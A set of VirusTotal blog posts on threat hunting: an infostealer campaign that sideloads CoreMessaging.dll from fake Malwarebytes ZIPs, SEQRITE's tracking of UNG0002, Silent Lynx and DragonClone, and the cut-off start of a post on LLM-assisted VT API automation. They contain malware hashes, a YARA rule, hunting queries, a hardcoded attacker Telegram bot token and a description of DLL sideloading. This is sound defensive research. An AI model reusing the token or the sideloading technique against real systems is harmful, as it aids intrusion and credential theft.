New Infostealer Campaign Targets Users via Spoofed Software Installers

Introduction

As part of our commitment to sharing interesting hunts, we are launching these ‘Flash Hunting Findings’ to highlight active threats. Our latest investigation tracks an operation active between January 11 and January 15, 2026, which uses consistent ZIP file structures and a unique behash (“4acaac53c8340a8c236c91e68244e6cb”) for identification. The campaign relies on a trusted executable to trick the operating system into loading a malicious payload, leading to the execution of secondary-stage infostealers.

Findings

The primary samples identified are ZIP files that mostly reference the Malwarebytes company and software using the filename malwarebytes-windows-github-io-X.X.X.zip. A notable feature for identification is that all of them share the same behash.
behash:"4acaac53c8340a8c236c91e68244e6cb"
The initial instance of these samples was identified on January 11, 2026, with the most recent occurrence recorded on January 14.
All of these ZIP archives share a nearly identical internal structure, containing the same set of files across the different versions identified. Of particular importance is the DLL file, which serves as the initial malicious payload, and a specific TXT file found in each archive. This text file has been observed on VirusTotal under two distinct filenames: gitconfig.com.txt and Agreement_About.txt.
The content of the TXT file holds no significant importance for the intrusion itself, as it merely contains a single string consisting of a GitHub URL.
However, this TXT is particularly valuable for pivoting and infrastructure mapping. By examining its “execution parents,” analysts can identify additional ZIP archives that are likely linked to the same malicious campaign. These related files can be efficiently retrieved for further investigation using the following VirusTotal API v3 endpoint:
/api/v3/files/09a8b930c8b79e7c313e5e741e1d59c39ae91bc1f10cdefa68b47bf77519be57/execution_parents
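As a minimal sketch of how that endpoint could be called, the snippet below builds the request with Python's standard library. The base URL and the x-apikey header follow the public VirusTotal API v3 conventions; the helper names execution_parents_url and fetch_execution_parents are illustrative assumptions, and only the first page of results is read.

```python
import json
import urllib.request

VT_API_BASE = "https://www.virustotal.com/api/v3"
# SHA-256 of the TXT file referenced in the endpoint above.
TXT_SHA256 = "09a8b930c8b79e7c313e5e741e1d59c39ae91bc1f10cdefa68b47bf77519be57"


def execution_parents_url(file_hash: str) -> str:
    """Return the API v3 URL listing the execution parents of a file."""
    return f"{VT_API_BASE}/files/{file_hash}/execution_parents"


def fetch_execution_parents(file_hash: str, api_key: str) -> list:
    """Fetch the first page of execution parents and return their ids."""
    request = urllib.request.Request(
        execution_parents_url(file_hash),
        headers={"x-apikey": api_key, "accept": "application/json"},
    )
    with urllib.request.urlopen(request, timeout=30) as response:
        payload = json.load(response)
    # Each entry in "data" is a file object; its "id" is the file's SHA-256.
    return [item["id"] for item in payload.get("data", [])]
```

Calling fetch_execution_parents(TXT_SHA256, api_key) with a valid key should return the hashes of the parent archives, which can then be compared against the ZIP hashes listed in the IOCs section.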
The primary payload of this campaign is contained within a malicious DLL named CoreMessaging.dll. Threat actors are utilizing a technique known as DLL Sideloading to execute this code. This involves placing the malicious DLL in the same directory as a legitimate, trusted executable (EXE) also found within the distributed ZIP file. When an analyst or user runs the legitimate EXE, the operating system is tricked into loading the malicious CoreMessaging.dll.
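The co-location that sideloading relies on can be checked before anything is executed. The sketch below is a triage heuristic only, assuming the archive keeps the legitimate EXE and CoreMessaging.dll in the same folder as described above. The function name sideload_candidates and the demo file names are hypothetical, and a hit is a reason to look closer, not a verdict.

```python
import io
import zipfile
from pathlib import PurePosixPath

SIDELOADED_DLL = "coremessaging.dll"  # DLL name reported for this campaign


def sideload_candidates(zip_file) -> list:
    """Return archive folders that hold both an EXE and CoreMessaging.dll."""
    exe_dirs, dll_dirs = set(), set()
    with zipfile.ZipFile(zip_file) as archive:
        for name in archive.namelist():
            path = PurePosixPath(name)
            folder = str(path.parent)
            if path.name.lower() == SIDELOADED_DLL:
                dll_dirs.add(folder)
            elif path.suffix.lower() == ".exe":
                exe_dirs.add(folder)
    # Only folders containing both file kinds are interesting.
    return sorted(dll_dirs & exe_dirs)


# Demo on an in-memory archive with made-up file names.
demo = io.BytesIO()
with zipfile.ZipFile(demo, "w") as archive:
    archive.writestr("app/setup.exe", b"MZ")
    archive.writestr("app/CoreMessaging.dll", b"MZ")
    archive.writestr("docs/readme.txt", b"hello")
print(sideload_candidates(demo))
```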
The identified DLLs exhibit distinctive metadata characteristics that are highly effective for pivoting and uncovering additional variants within the same campaign. Security analysts can utilize specific hunting queries to track down other malicious DLLs belonging to this activity. For instance, analysts can search for samples sharing the following unique signature strings found in the file metadata:
signature:"Peastaking plenipotence ductileness chilopodous codicillary."
signature:"© 2026 Eosinophil LLC"
Furthermore, the exported functions within these DLLs contain unusual alphanumeric strings. These exports serve as reliable indicators for identifying related malicious components across different stages of the campaign:
exports:15Mmm95ml1RbfjH1VUyelYFCf exports:2dlSKEtPzvo1mHDN4FYgv
Finally, another observation for behavioral analysis can be found in the relations tab of the ZIP files. These files document the full infection chain observed during sandbox execution, where the sandbox extracts the ZIP, runs the legitimate EXE, and subsequently triggers the loading of the malicious DLL. Within the Payload Files section, additional payloads are visible. These represent secondary stages dropped during the initial DLL execution, which act as the final malware samples. These final payloads are primarily identified as infostealers, designed to exfiltrate sensitive data.
Analysis of the ZIP files’ behavioral relations reveals a recurring payload file consistently flagged as an infostealer. This malicious component is identified by various YARA rules, including, among others, those specifically designed to detect signatures associated with stealing cryptocurrency wallet browser extension IDs.
To identify and pivot through the various secondary-stage payloads dropped during this campaign, analysts can utilize a specific behash identifier. These files represent the final infection stage and are primarily designed to exfiltrate credentials and crypto-wallet information. The following behash provides a reliable pivot point for uncovering additional variants.
behash:5ddb604194329c1f182d7ba74f6f5946

IOCs

We have created a public VirusTotal Collection to share all the IOCs in an easy and free way. Below you can find a YARA rule for the malicious DLLs, followed by the main IOCs related to the ZIP files, the DLLs, and the dropped payloads.
import "pe"

rule win_dll_sideload_eosinophil_infostealer_jan26
{
  meta:
    author = "VirusTotal"
    description = "Detects malicious DLLs (CoreMessaging.dll) from an infostealer campaign impersonating Malwarebytes, Logitech, and others via DLL sideloading."
    reference = "https://blog.virustotal.com/2026/01/malicious-infostealer-january-26.html"
    date = "2026-01-16"
    behash = "4acaac53c8340a8c236c91e68244e6cb"
    target_entity = "file"
    hash = "606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463"
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and pe.is_dll()) and
    pe.exports("15Mmm95ml1RbfjH1VUyelYFCf") and pe.exports("2dlSKEtPzvo1mHDN4FYgv")
}
sha256 description
6773af31bd7891852c3d8170085dd4bf2d68ea24a165e4b604d777bd083caeaa malwarebytes-windows-github-io-X.X.X.zip
4294d6e8f1a63b88c473fce71b665bbc713e3ee88d95f286e058f1a37d4162be malwarebytes-windows-github-io-X.X.X.zip
5591156d120934f19f2bb92d9f9b1b32cb022134befef9b63c2191460be36899 malwarebytes-windows-github-io-X.X.X.zip
42d53bf0ed5880616aa995cad357d27e102fb66b2fca89b17f92709b38706706 malwarebytes-windows-github-io-X.X.X.zip
5aa6f4a57fb86759bbcc9fc6c61b5f74c0ca74604a22084f9e0310840aa73664 malwarebytes-windows-github-io-X.X.X.zip
84021dcfad522a75bf00a07e6b5cb4e17063bd715a877ed01ba5d1631cd3ad71 malwarebytes-windows-github-io-X.X.X.zip
ca8467ae9527ed908e9478c3f0891c52c0266577ca59e4c80a029c256c1d4fce malwarebytes-windows-github-io-X.X.X.zip
9619331ef9ff6b2d40e77a67ec86fc81b050eeb96c4b5f735eb9472c54da6735 malwarebytes-windows-github-io-X.X.X.zip
a2842c7cfaadfba90b29e0b9873a592dd5dbea0ef78883d240baf3ee2d5670c5 malwarebytes-windows-github-io-X.X.X.zip
4705fd47bf0617b60baef8401c47d21afb3796666092ce40fbb7fe51782ae280 malwarebytes-windows-github-io-X.X.X.zip
580d37fc9d9cc95dc615d41fa2272f8e86c9b4da2988a336a8b3a3f90f4363c2 malwarebytes-windows-github-io-X.X.X.zip
d47fd17d1d82ea61d850ccc2af3bee54adce6975d762fb4dee8f4006692c5ef7 malwarebytes-windows-github-io-X.X.X.zip
606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463 CoreMessaging.dll DLL loaded by DLL SideLoading
fd855aa20467708d004d4aab5203dd5ecdf4db2b3cb2ed7e83c27368368f02bb CoreMessaging.dll DLL loaded by DLL SideLoading
a0687834ce9cb8a40b2bb30b18322298aff74147771896787609afad9016f4ea CoreMessaging.dll DLL loaded by DLL SideLoading
4235732440506e626fd4d0fffad85700a8fcf3e83ba5c5bc8e19ada508a6498e CoreMessaging.dll DLL loaded by DLL SideLoading
cd1fe2762acf3fb0784b17e23e1751ca9e81a6c0518c6be4729e2bc369040ca5 CoreMessaging.dll DLL loaded by DLL SideLoading
f798c24a688d7858efd6efeaa8641822ad269feeb3a74962c2f7c523cf8563ff CoreMessaging.dll DLL loaded by DLL SideLoading
0698a2c6401059a3979d931b84d2d4b011d38566f20558ee7950a8bf475a6959 CoreMessaging.dll DLL loaded by DLL SideLoading
1b3bee041f2fffcb9c216522afa67791d4c658f257705e0feccc7573489ec06f CoreMessaging.dll DLL loaded by DLL SideLoading
231c05f4db4027c131259d1acf940e87e15261bb8cb443c7521294512154379b CoreMessaging.dll DLL loaded by DLL SideLoading
ec2e30d8e5cacecdf26c713e3ee3a45ebc512059a64ba4062b20ca8bec2eb9e7 CoreMessaging.dll DLL loaded by DLL SideLoading
58bd2e6932270921028ab54e5ff4b0dbd1bf67424d4a5d83883c429cadeef662 CoreMessaging.dll DLL loaded by DLL SideLoading
57ed35e6d2f2d0c9bbc3f17ce2c94946cc857809f4ab5c53d7cb04a4e48c8b14 CoreMessaging.dll DLL loaded by DLL SideLoading
cfcf3d248100228905ad1e8c5849bf44757dd490a0b323a10938449946eabeee CoreMessaging.dll DLL loaded by DLL SideLoading
f02be238d14f8e248ad9516a896da7f49933adc7b36db7f52a7e12d1c2ddc6af CoreMessaging.dll DLL loaded by DLL SideLoading
f60802c7bec15da6d84d03aad3457e76c5760e4556db7c2212f08e3301dc0d92 CoreMessaging.dll DLL loaded by DLL SideLoading
02dc9217f870790b96e1069acd381ae58c2335b15af32310f38198b5ee10b158 CoreMessaging.dll DLL loaded by DLL SideLoading
f9549e382faf0033b12298b4fd7cd10e86c680fe93f7af99291b75fd3d0c9842 CoreMessaging.dll DLL loaded by DLL SideLoading
92f4d95938789a69e0343b98240109934c0502f73d8b6c04e8ee856f606015c8 CoreMessaging.dll DLL loaded by DLL SideLoading
66fba00b3496d61ca43ec3eae02527eb5222892186c8223b9802060a932a5a7a CoreMessaging.dll DLL loaded by DLL SideLoading
e5dd464a2c90a8c965db655906d0dc84a9ac84701a13267d3d0c89a3c97e1e9b CoreMessaging.dll DLL loaded by DLL SideLoading
35211074b59417dd5a205618fed3402d4ac9ca419374ff2d7349e70a3a462a15 CoreMessaging.dll DLL loaded by DLL SideLoading
6863b4906e0bd4961369b8784b968b443f745869dbe19c6d97e2287837849385 CoreMessaging.dll DLL loaded by DLL SideLoading
a83c478f075a3623da5684c52993293d38ecaa17f4a1ddca10f95335865ef1e2 CoreMessaging.dll DLL loaded by DLL SideLoading
43e2936e4a97d9bc43b423841b137fde1dd5b2f291abf20d3ba57b8f198d9fab CoreMessaging.dll DLL loaded by DLL SideLoading
f001ae3318ba29a3b663d72b5375d10da5207163c6b2746cfae9e46a37d975cf CoreMessaging.dll DLL loaded by DLL SideLoading
c67403d3b6e7750222f20fa97daa3c05a9a8cce39db16455e196cd81d087b54d CoreMessaging.dll DLL loaded by DLL SideLoading
5ee9d4636b01fd3a35bd8e3dce86a8c114d8b0aa6b68b1d26ace7ef0f85b438a Payload dropped by one of the malicious DLLs
e84b0dadb0b6be9b00a063ed82c8ddba06a2bd13f07d510d14e6fd73cd613fba Payload dropped by one of the malicious DLLs


VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder

Introduction
We have recently started a new blog series called #VTPRACTITIONERS. This series aims to share with the community what other practitioners are able to research using VirusTotal from a technical point of view.

Our first blog saw our colle…

VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone

Introduction

One of the best parts of being at VirusTotal (VT) is seeing all the amazing ways our community uses our tools to hunt down threats. We love hearing about your successes, and we think the rest of the community would too.
That’s why we’re so excited to start a new blog series where we’ll be sharing success stories from some of our customers. They’ll be giving us a behind-the-scenes look at how they pivot from an initial clue to uncover entire campaigns.

To kick things off, we’re thrilled to have our friends from SEQRITE join us. Their APT-Team is full of incredible threat hunters, and they’ve got a great story to share about how they’ve used VT to track some sophisticated actors.

How VT plays a role in hunting for analysts

For a threat analyst, the hunt often begins with a single, seemingly isolated clue—a suspicious file, a strange domain, or an odd IP address. The challenge is to connect that one piece of the puzzle to the larger picture. This is where VT truly shines.

VT is more than just a tool for checking if a file is malicious. It’s a massive, living database of digital artifacts (process activity, registry key activity, memory dumps, LLM verdicts, among others) and their relationships. It allows analysts to pivot from one indicator of compromise to another, uncovering hidden connections and mapping out entire attack campaigns. It’s this ability to connect the dots—to see how a piece of malware communicates with a C2 server, what other files are associated with it, what processes were launched or files were used to set persistence or exfiltrate information, and who else has seen it—that transforms a simple file check into a full-blown investigation. The following story from SEQRITE is a perfect example of this process in action.

Seqrite – Success Story

[In the words of SEQRITE…]
We at SEQRITE APT-Team perform a lot of activities, including threat hunting and threat intelligence, using customer telemetry and multiple other data corpuses. Apart from our customer telemetry, the VT corpus has undoubtedly helped our research: hunting for unique campaigns and pivoting multiple times has led us to an interesting set of campaigns across Central, South, and East Asia.

UNG0002

SEQRITE APT-Team has been tracking a South-East Asian threat entity, termed UNG0002, using certain behavioral artefacts, such as similar OPSEC mistakes and a similar set of decoys and post-exploitation toolkit across multiple operational campaigns ranging from May 2024 to May 2025.
During the initial phase of this campaign, the threat actor hit multiple targets across Hong Kong and Pakistan in sectors including defence, electrotechnical, medical science, academia and many more.
VT corpus has helped us to pivot through Cobalt Strike oriented beacons, which were used by this threat actor to target various sectors. In our hunt for malicious activity, we discovered a series of Cobalt Strike beacons. These were all delivered through similar ZIP files, which acted as lures. Each ZIP archive contained the same set of file types: a malicious executable, along with LNK, VBS, and PDF decoy files. The beacons themselves were also similar, sharing configurations, filenames and compilation timestamps.
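The shared archive layout described above lends itself to a quick local check. The following is a minimal sketch, assuming that "the same set of file types" can be approximated by file extensions alone; the name matches_lure_profile and the demo file names are hypothetical, and extensions are easy to fake, so this is only a first-pass filter.

```python
import io
import zipfile
from pathlib import PurePosixPath

# File types reported inside each lure archive.
LURE_EXTENSIONS = {".exe", ".lnk", ".vbs", ".pdf"}


def matches_lure_profile(zip_file) -> bool:
    """True when the archive holds at least one file of every lure type."""
    with zipfile.ZipFile(zip_file) as archive:
        found = {
            PurePosixPath(name).suffix.lower()
            for name in archive.namelist()
            if not name.endswith("/")  # skip directory entries
        }
    return LURE_EXTENSIONS <= found


# Demo on an in-memory archive with made-up file names.
lure = io.BytesIO()
with zipfile.ZipFile(lure, "w") as archive:
    for member in ("cv.pdf", "cv.pdf.lnk", "run.vbs", "bin/imebroker.exe"):
        archive.writestr(member, b"")
print(matches_lure_profile(lure))
```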

Using the timestamps from the malicious executables and the filenames previously mentioned, we discovered up to 14 different samples, all of them related to the campaign, with this query:
VirusTotal query: metadata:"2015:07:10 03:27:31+00:00" filename:"imebroker.exe"

Based on the configuration extracted by VT, we could use the extracted public key to identify more samples using exactly the same key with the following query:
malware_config:30819f300d06092a864886f70d010101050003818d003081890281810096cc4e6ad9aee91ca69b7b44465e17412626a11c7855b7a69daad00f48c0ea98f0e389a0a1c4b74332bf0d603a6e53e05ee734c9a289ff172204bfc9430ed4d6041402d02b526e902b95f6f219598cb1b6391403fa627ab36dbe88646620369e7ec89bdc31f1a2b0bedba1852d5e7656d3b297f9d39f357816f0677563bc496b020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Besides these executables, we mentioned that there were also LNK files within the ZIP files. Analyzing their metadata revealed the same LNK-ID identifiers across many samples.
Querying VT for those LNK-IDs exposed new files related to the campaign.
VirusTotal query: metadata:"laptop-g5qalv96"

Decoy documents identified within the ZIP files mentioned above

We initially tracked several campaigns leveraging LNK-based device IDs and Cobalt Strike beacons. However, an intriguing shift began to emerge in the September-October activity. We observed a new set of campaigns that frequently used CV-themed decoys, often impersonating students from prominent Chinese research institutions.

While the spear-phishing tactics remained similar, the final execution changed. The threat actors dropped their Cobalt Strike beacons and pivoted toward DLL-Sideloading for their payloads, all while keeping the same decoy theme. This significant change in technique led us to identify a second major wave of this activity, which we’re officially labeling Operation AmberMist.

Tracking this second wave of operations attributed to the UNG0002 cluster, we observed a recurring behavioral artifact: the use of academia-themed lures targeting victims in China and Hong Kong.

Across these campaigns, multiple queries were leveraged, but a consistent pattern emerged—heavy reliance on LOLBINS such as wscript.exe, cscript.exe, and VBScripts for persistence.

By developing a simple yet effective hunting query, we were able to uncover a previously unseen sample that had not been publicly reported:
type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK


Silent Lynx

Another campaign tracked by the SEQRITE APT-team, named Silent Lynx, targeted multiple sectors including banking. As in the previously described case, thanks to VT we were able to pivot and identify new samples associated with this campaign.
Initial Discovery and Pivoting
During the initial phase of this campaign, we discovered a decoy-based SPECA-related archive file targeting Kyrgyzstan around December 2024 – January 2025. The decoy was designed to distract from the real payload: a malicious C++ implant.
Decoy document identified during our research

Second campaign of Silent Lynx @ Bank of Kyrgyz Republic
Email identified during our research

We performed multiple pivots focusing on the implant, starting by analyzing the sample’s metadata, network indicators and functionalities. We found that the threat actor had been using a similar C++ implant, which led us to another Silent Lynx campaign targeting the banking sector of Kyrgyzstan.

Information obtained during the analysis of the C++ implants


We leveraged the VT corpus to deploy multiple Livehunt rules at multiple junctures. Some of the simpler examples are as follows:

  • Looking at the usage of an encoded Telegram Bot based payload inside the C++ implant. Using either the content or malware_config modifiers, when the value is extracted from the config, could help us to identify new samples.

  • Spawning the Powershell.exe LOLBIN.

  • VT search enablers for checking for malicious email files, if uploaded from the Central Asian geosphere.

  • ISO-oriented first-stagers.

  • Multiple behavioral overlaps between YoroTrooper & Silent Lynx, and further hunting hypotheses developed by us.

Leveraging the VT corpus and pivoting further on the above metrics, and on many others included in the malicious spear-phishing email, we also tracked some further campaigns. Most importantly, each time we developed a new YARA rule and a new hypothesis to hunt for similar implants with the Livehunt feature, tailored to the specifications and raw data we received during hunting and keeping false positives and false negatives in mind.

Decoy document identified during our hunting activities

Submissions identified in the decoy document

The threat actor repeatedly used the same implant across multiple campaigns in Uzbekistan and Turkmenistan. Using hunting queries through VT along with submitter:UZ or submitter:TM helped us to identify these samples.
The most important pivot in our investigation was the malware sample itself: as shown in the previous screenshots, it used an encoded PowerShell blob spawning powershell.exe, a technique that was used multiple times across different campaigns. This sample acted as a key indicator, allowing us to uncover other campaigns targeting critical sectors in the region, and confirmed the repetitive nature of the actor’s operations.
Also, we leveraged VT’s collections feature to build an attribution of the threat entity.
Collections used during the attribution process

DragonClone

Finally, the last campaign we want to use to illustrate how pivoting within the VT ecosystem enabled our team to uncover new samples was run by a group we named DRAGONCLONE.
The SEQRITE APT Team has been monitoring DRAGONCLONE as they actively target critical sectors across Asia and the globe. They utilize sophisticated methods for cyber-espionage, compromising strategic organizations in sectors like telecom and energy through the deployment of custom malware implants, the exploitation of unpatched vulnerabilities, and extensive spear-phishing.

Initial Discovery
Recently, on 13th May, our team discovered a malicious ZIP file that surfaced across various sources, including VT. The ZIP file was used as a preliminary infection vector and contained multiple EXE and DLL files inside the archive, like this one, which contains the malicious payload.
Chinese-based threat actors have a well-known tendency to deliver DLL sideloading implants as part of their infection chains. Leveraging crowdsourced Sigma rules in VT, along with personal hunting techniques using static YARA signatures, we were able to track and hunt this malicious spear-phishing attachment effectively. In their public Sigma Rules list you can find different Sigma Rules that are created to identify DLL SideLoading.
Pivoting Certificates via VT Corpus
While exploring the network of related artifacts, we could not initially find any direct commonalities. However, a particular clean-looking executable named “2025 China Mobile Tietong Co., Ltd. Internal Training Program” raised our concern. Its naming and metadata suggested potential masquerading behavior, making it a critical pivot point that required deeper investigation.
Certificates are among the most important indicators when looking into malicious artefacts. We saw that the executable is a fresh and clean copy of WonderShare’s Repairit software, a well-known tool for repairing corrupted files; suspiciously, however, it has been signed by ShenZhen Thunder Networking Technologies Ltd.
VirusTotal query: signature:"ShenZhen Thunder Networking Technologies Ltd."

Acting on this hunch, we hunted for executables signed with the same certificate and found multiple malicious binaries. This was not the only indicator or pivot, but it was a key one for researching further ones.

Pivoting on Malware Configs via VT Corpus
We analyzed the loader and determined it’s slightly advanced, performing complex tasks like anti-debugging. More significantly, it drops V-Shell, a post-exploitation toolkit. V-Shell was originally open-source but later taken down by its authors and has been observed in campaigns by Earth Lamia.

After extracting the V-Shell shellcode, we discovered an unusual malware configuration property: qwe123qwe. By leveraging the VT corpus to pivot on this finding, we were able to identify additional V-Shell implant samples potentially linked to this campaign.
VirusTotal query: malware_config:"qwe123qwe"

VT Tips (based on the success story)

[In the words of VirusTotal…]
Threat hunting is an art, and a good artist needs the right tools and techniques. In this section, we’ll share some practical tips for pivoting and hunting within the VirusTotal ecosystem, inspired by the techniques used in the campaigns discussed in this blog post.

Hunt by Malware Configuration

Many malware families use configuration files to store C2 information, encryption keys, and other operational data. For some malware families, VirusTotal automatically extracts these configurations. You can use unique values from these configurations to find other samples from the same campaign.

For instance, in the DRAGONCLONE investigation, the V-Shell implant had an unusual malware configuration property: qwe123qwe. A simple query like malware_config:"qwe123qwe" in VT can reveal other samples using the same configuration. Similarly, the Cobalt Strike beacons used by UNG0002 had a unique public key in their configuration that could be used for pivoting. This is possible thanks to Backscatter. We’ve written blogs showing how to do advanced hunting using only the malware_config modifier. Remember that you can search for anything from a family name, like malware_config:"redline", to Telegram tokens and even URLs configured in the malware configuration, like malware_config:"https://steamcommunity.com/profiles/76561198780612393".
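When such queries are assembled in a script, or pasted from a rendered web page, typographic quotes can slip in where the search syntax expects plain double quotes. The helpers below are a small sketch for composing terms safely; vt_term, vt_query and normalize_quotes are hypothetical names, and joining terms with a space simply mirrors the space-separated queries shown in this post.

```python
# Typographic characters that often replace a plain double quote.
_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2033": '"'})


def normalize_quotes(query: str) -> str:
    """Replace curly quotes and double primes with straight double quotes."""
    return query.translate(_QUOTES)


def vt_term(modifier: str, value: str) -> str:
    """Format a single modifier:"value" search term."""
    if '"' in value:
        # Escaping rules are not covered here, so refuse instead of guessing.
        raise ValueError("value must not contain a double quote")
    return f'{modifier}:"{value}"'


def vt_query(*terms: str) -> str:
    """Join already formatted terms into one space-separated query."""
    return " ".join(terms)


print(vt_term("malware_config", "qwe123qwe"))
print(vt_query(vt_term("metadata", "2015:07:10 03:27:31+00:00"),
               vt_term("filename", "imebroker.exe")))
```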

Don’t Overlook LNK File Metadata

Threat actors often make operational security (OPSEC) mistakes. One common mistake is failing to remove metadata from files, including LNK (shortcut) files. This metadata can reveal information about the attacker’s machine, such as the hostname.

In the UNG0002 campaign, the actor consistently used LNK files with the same metadata, specifically the machine identifier laptop-g5qalv96. This allowed the SEQRITE team to uncover a wider set of samples by querying VirusTotal for this metadata string. We know that actors can also modify this information to deceive security researchers, but it often still provides good information that can be used to track them.

Track Actors via Leaked Bot Tokens

Some malware, especially those using public platforms for command and control, will have hardcoded API tokens. As seen in the “Silent Lynx” campaign, a PowerShell script used a hardcoded Telegram bot token for C2 communication and data exfiltration.

These tokens can be extracted from memory dumps during sandbox execution or from the malware’s code itself. Once you have a token, you may be able to track the threat actor’s commands and even identify other victims, as was done in the Silent Lynx investigation.
A concrete example of using Telegram bot tokens is the query malware_config:"bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8", which is associated with four infostealer samples uploaded between 2024 and 2025.
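Extracting such tokens from a decoded script or a strings dump can be sketched with a regular expression. The pattern below is an assumption based on the token shown above (a numeric bot id, a colon, and 35 URL-safe characters, optionally prefixed with "bot" as in Bot API URLs); real tokens may deviate from it, and the name find_bot_tokens is hypothetical.

```python
import re

# Assumed shape: [bot]<8-10 digit id>:<35 characters from A-Z a-z 0-9 _ ->
TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9_-])(?:bot)?(\d{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])"
)


def find_bot_tokens(text: str) -> list:
    """Return unique id:secret tokens in order of first appearance."""
    tokens = []
    for match in TOKEN_RE.finditer(text):
        token = f"{match.group(1)}:{match.group(2)}"
        if token not in tokens:
            tokens.append(token)
    return tokens


sample = (
    'Invoke-WebRequest "https://api.telegram.org/'
    'bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8/sendMessage"'
)
for token in find_bot_tokens(sample):
    # The query form used in this post keeps the "bot" prefix.
    print(f'malware_config:"bot{token}"')
```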

Leverage Code-Signing Certificates

Threat actors sometimes sign their malicious executables to make them appear legitimate. They may use stolen certificates or freshly created ones. These certificates can be a powerful pivot point.

In the DRAGONCLONE case, a suspicious executable was signed by “ShenZhen Thunder Networking Technologies Ltd.”. By searching for other files signed with the same certificate (signature:"ShenZhen Thunder Networking Technologies Ltd."), you can uncover other tools in the attacker’s arsenal.

Utilize YARA and Sigma Rules

For proactive hunting, you can develop your own YARA rules to find malware families based on unique strings, code patterns, or other characteristics. This was a key technique in the “Silent Lynx” campaign for hunting similar implants.

Additionally, you can leverage the power of the community by using crowdsourced Sigma rules in VirusTotal, even within your YARA rules. These rules can help you identify malicious behaviors, such as the DLL sideloading techniques used by DRAGONCLONE, directly from sandbox execution data.
For example, if you want to search for the Sigma rule “Potential DLL Sideloading Of MsCorSvc.DLL” in VT files, you can use the query sigma_rule:99b4e5347f2c92e8a7aeac6dc7a4175104a8ba3354e022684bd3780ea9224137 to do so. All the Sigma rules are updated from the public repo and can be consumed here.

Conclusion

The success stories of the SEQRITE APT-Team in tracking campaigns like UNG0002, Silent Lynx, and DRAGONCLONE demonstrate the power of VirusTotal as a collaborative and comprehensive threat intelligence platform. By leveraging a combination of malware configuration analysis, metadata pivoting, and community-driven tools like YARA and Sigma rules, security researchers can effectively uncover and track sophisticated threat actors.

These examples highlight that successful threat hunting is not just about having the right tools, but also about applying creative and persistent investigation techniques. The ability to pivot from one piece of evidence to another is crucial in connecting the dots and revealing the full scope of a campaign. The SEQRITE team has demonstrated a deep understanding of these pivoting techniques, and we appreciate that they have decided to share their valuable insights with the rest of the community.

We hope these tips and stories have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.

If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us at practitioners@virustotal.com, and we will be happy to feature your story in a future blog post.

Together, we can make the digital world a safer place.


Advanced Threat Hunting: Automating Large-Scale Operations with LLMs

Last week, we were fortunate enough to attend the fantastic LABScon conference, organized by the SentinelOne Labs team. While there, we presented a workshop titled ‘Advanced Threat Hunting: Automating Large-Scale Operations with LLMs.’ The main goal of this workshop was to show attendees how they could automate their research using the VirusTotal API and Gemini. Specifically, we demonstrated how to integrate the power of Google Colab to quickly and efficiently generate Jupyter notebooks using natural language.

It goes without saying that the use of LLMs is a must for every analyst today. For this reason, we also want to make life easier for everyone who uses the VirusTotal API for research.

The Power of the VirusTotal API and vt-py

The VirusTotal API is the programmatic gateway to our massive repository of threat intelligence data. While the VirusTotal GUI is great for agile querying, the API unlocks the ability to conduct large-scale, automated investigations and access raw data with more pivoting opportunities.

To make interacting with the API even easier, we recommend using the vt-py library. It simplifies much of the complexity of HTTP requests, JSON parsing, and rate limit management, making it the go-to choice for Python users.

From Natural Language to Actionable Intelligence with Gemini

To bridge the gap between human questions and API queries, we can leverage the integrated Gemini in Google Colab. We have created a “meta Colab” notebook (which we will share soon) that is pre-populated with real, working code snippets for interacting with the VirusTotal API to retrieve information such as campaigns, threat actors, malware, samples, and URLs, among others. This provides Gemini with the necessary context to understand your natural language requests and generate accurate Python code to query the VirusTotal API. Gemini doesn’t call the API directly; it creates the code snippet for you to execute.

For Gemini to generate accurate and relevant code, it needs context. Our meta Colab notebook is filled with examples that act as a guide. For complex questions, it helps to provide the exact field names that you want to work with. This context generally falls into two categories:

  1. Reference Documentation: We include detailed documentation directly in the Colab. For example, we provide a comprehensive list of all available file search modifiers for the VirusTotal Intelligence search endpoint. This gives Gemini the “vocabulary” it needs to construct precise queries.
  2. Working Code Examples: The notebook is pre-populated with dozens of working vt-py code snippets for common tasks like retrieving file information, performing an intelligence search, or getting relationships. This gives Gemini the “grammar” and correct patterns for interacting with our API.

Example of code snippet context that we have included in our meta colab:

query_results_with_behaviors = []
query = "have:sigma have:yara have:ids have:malware_config fs:1d+ have:bundled_file tag:overlay"
RELATIONS = "behaviours"

async for itemobj in cli.iterator('/intelligence/search',params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): '\*'},limit=0):
    query_results_with_behaviors.append(itemobj.to_dict())

res_with_behaviors = list(query_results_with_behaviors)
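
The `params` dictionary in the snippet above follows a fixed pattern: the query, the relationship name, and a `relationship_attributes[...]` key named after that relationship. A minimal sketch of a helper that assembles it is shown below. `build_search_params` is a hypothetical name (it is not part of vt-py), and `cli` is assumed to be an already authenticated vt-py client, as in the notebook.

```python
def build_search_params(query, relationship=None, attributes="*"):
    """Build the params dict for an /intelligence/search request.

    Hypothetical helper (not part of vt-py); it only assembles the
    dictionary used in the notebook snippets.
    """
    params = {"query": query}
    if relationship:
        params["relationships"] = relationship
        # Request the attributes of the related objects, not just their IDs.
        params[f"relationship_attributes[{relationship}]"] = attributes
    return params


params = build_search_params("type:lnk p:5+", relationship="behaviours")
print(params)
# In the notebook, this dict would be passed as:
#   cli.iterator('/intelligence/search', params=params, limit=0)
```

Keeping the dictionary construction in one place makes it harder to mistype the bracketed key when switching from one relationship to another.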

